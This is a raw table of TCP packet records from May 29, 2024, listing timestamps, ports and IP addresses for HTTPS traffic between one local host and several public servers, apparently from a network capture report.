May 29, 2024 15:06:22.763976097 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764040947 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.764054060 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764134884 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764178991 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.764185905 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764281034 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764321089 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.764326096 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764434099 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764477015 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.764487982 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764662027 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764777899 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764831066 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.764837027 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.764889002 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.768395901 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.844497919 CEST | 443 | 49712 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.847064018 CEST | 49712 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:22.855201006 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.859617949 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.859827042 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.859930038 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.859985113 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.859993935 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860029936 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.860033989 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860162020 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860250950 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860294104 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.860299110 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860413074 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860457897 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.860461950 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860492945 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.860541105 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860938072 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.860986948 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.860992908 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.861455917 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.861500978 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.861505985 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.861632109 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.861680984 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.861685038 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.861788988 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.862253904 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.862308025 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.862313986 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.862474918 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.862524033 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.862529039 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.862561941 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.862565994 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.863256931 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.863306999 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.863312960 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.954965115 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955041885 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955054045 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955158949 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955207109 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955214977 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955317020 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955372095 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955377102 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955411911 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955426931 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955446005 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955472946 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955580950 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955590963 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955616951 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955621958 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955641985 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955645084 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955689907 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955693960 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955703020 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955728054 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955732107 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955751896 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955753088 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955810070 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955811977 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955818892 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.955868006 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.955959082 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.956006050 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.956037045 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.956069946 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.956075907 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.956079006 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.956099987 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.956116915 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.956120968 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.956186056 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.956362963 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.956669092 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.960340977 CEST | 49713 | 443 | 192.168.2.9 | 104.21.84.200 |
May 29, 2024 15:06:22.960355043 CEST | 443 | 49713 | 104.21.84.200 | 192.168.2.9 |
May 29, 2024 15:06:22.970940113 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.970958948 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.971052885 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:22.971064091 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.971081018 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.971088886 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.971100092 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:22.971122026 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:22.971124887 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.971132040 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:22.971169949 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.053658009 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.053673983 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.053709030 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.053726912 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.053730965 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.053742886 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.053765059 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.053769112 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.053776979 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.053782940 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.053809881 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.084675074 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.084728003 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.084742069 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.084753990 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.084794044 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.084796906 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.084831953 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.085145950 CEST | 49710 | 443 | 192.168.2.9 | 52.85.49.85 |
May 29, 2024 15:06:23.085161924 CEST | 443 | 49710 | 52.85.49.85 | 192.168.2.9 |
May 29, 2024 15:06:23.116354942 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:23.116388083 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:23.116530895 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:23.116897106 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:23.116909027 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:23.138305902 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.138386011 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.138465881 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.138537884 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.138557911 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.138616085 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.138639927 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.138685942 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.138767004 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.138863087 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.138880968 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.139003992 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.139257908 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.139290094 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.139391899 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.139411926 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.139499903 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.139525890 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.139770031 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:23.139777899 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:23.139826059 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:23.140048027 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.140062094 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.140259981 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.140280962 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.140393019 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:23.140402079 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:23.140429020 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.140603065 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.140625000 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.792880058 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.792937040 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.802333117 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.802393913 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.802614927 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.803096056 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.803113937 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.803965092 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.804037094 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.804100990 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.804157972 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.804790020 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.804805040 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.805942059 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.806005955 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.815452099 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.815524101 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.815855980 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.815932989 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.815952063 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.816019058 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.819365025 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.819381952 CEST | 443 | 49722 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.819427967 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.819451094 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.819530010 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.819555044 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.820691109 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.821183920 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.821194887 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.822352886 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.822557926 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.823631048 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.824347019 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.824433088 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.825848103 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.825865030 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.826205969 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.826212883 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.827480078 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.827573061 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.828032017 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.828123093 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.828375101 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.828382969 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.869178057 CEST | 49722 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.871248960 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.871269941 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.871282101 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.871282101 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.918956041 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.919006109 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.919061899 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.919172049 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.919435024 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.921025038 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.921042919 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.921092987 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.921125889 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.921478033 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.921530962 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.924446106 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:23.925739050 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:23.925746918 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:23.927001953 CEST | 49718 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.927031040 CEST | 443 | 49718 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.927547932 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:23.927622080 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:23.932642937 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:23.932723045 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:23.932945967 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:23.932951927 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:23.934164047 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.934243917 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.934324980 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.934478998 CEST | 49717 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.934492111 CEST | 443 | 49717 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.935106039 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.935482025 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.935534954 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.948740959 CEST | 49719 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.948765039 CEST | 443 | 49719 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.949203014 CEST | 49720 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:23.949217081 CEST | 443 | 49720 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:23.975516081 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.030937910 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.030970097 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.031047106 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.031156063 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.031203032 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.031341076 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.031347990 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.031371117 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.031419039 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.033328056 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.033341885 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.034204960 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.041090965 CEST | 49729 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.041101933 CEST | 443 | 49729 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.041281939 CEST | 49728 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.041294098 CEST | 443 | 49728 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.041528940 CEST | 49727 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.041548014 CEST | 443 | 49727 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.041851044 CEST | 49726 | 443 | 192.168.2.9 | 13.107.246.45 |
May 29, 2024 15:06:24.041872025 CEST | 443 | 49726 | 13.107.246.45 | 192.168.2.9 |
May 29, 2024 15:06:24.067689896 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.068227053 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.068236113 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.069108009 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.069165945 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.071655035 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.071708918 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.072086096 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.072092056 CEST | 443 | 49721 | 152.199.23.37 | 192.168.2.9 |
May 29, 2024 15:06:24.116240978 CEST | 49721 | 443 | 192.168.2.9 | 152.199.23.37 |
May 29, 2024 15:06:24.219538927 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.269005060 CEST | 49716 | 443 | 192.168.2.9 | 192.229.133.221 |
May 29, 2024 15:06:24.313003063 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.313045025 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
May 29, 2024 15:06:24.313064098 CEST | 443 | 49716 | 192.229.133.221 | 192.168.2.9 |
